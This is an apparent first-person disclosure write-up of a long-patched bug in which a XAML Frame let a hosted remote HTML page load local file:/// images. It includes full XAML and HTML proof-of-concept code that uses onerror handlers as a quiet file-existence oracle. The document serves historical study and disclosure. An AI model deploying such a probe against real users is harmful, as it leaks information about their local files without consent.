XAML Frame: Loading Local Images via file:// Protocol

Continuing the investigation of what XAML Frame pages could access that standard Internet Zone pages could not, I found that <img> tags with file:/// URLs loaded successfully inside a XAML Frame. A standard Internet Zone page gets a security error trying the same thing. This meant a remote page hosted inside a XAML Frame could both display the user’s local images and — combined with an onerror handler — use image load failures as a file-existence oracle.

<Page	xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
		WindowTitle="XAML_LoadLocalImages">
	<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
	<Bold>This is a XAML Frame:</Bold>
		<LineBreak /><LineBreak /><LineBreak />
		&lt;<Bold>Frame</Bold> Width="700" Height="600" Source="LoadLocalImages.html" /&gt;
		<LineBreak /><LineBreak />
		<Frame Width="700" Height="600" Source="LoadLocalImages.html" />
	</TextBlock>
</Page>

LoadLocalImages.html (the HTML page loaded inside the XAML Frame):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_LoadLocalImages</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_LoadLocalImages</h2>
</center>
If we are inside a Framed XAML, we can <b>load local IMG Files</b> and/or check if they exist.<br /><br />
&lt;img src="file:///c:/Windows/Web/Wallpaper/img1.jpg"&gt;<br />
<img src="file:///c:/Windows/Web/Wallpaper/img1.jpg" onerror="this.style.display='none'"><br />
<img src="file:///c:/Windows/Web/Wallpaper/Autumn.jpg" onerror="this.style.display='none'"><br />
</font>
</body>
</html>

The XAML Frame host did not enforce the same-zone restriction that prevents Internet Zone HTML pages from loading file:/// resources. As a result, <img src="file:///c:/Windows/Web/Wallpaper/Autumn.jpg"> loaded and rendered the local wallpaper image directly in the page. The onerror="this.style.display='none'" handlers hide images that fail to load, which also provides a quiet file-existence check — if the image renders, the file is there. Combined with the other XAML Frame information disclosure issues (script tag src, document.URL), this illustrated a consistent pattern of the XAML hosting layer being insufficiently sandboxed.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.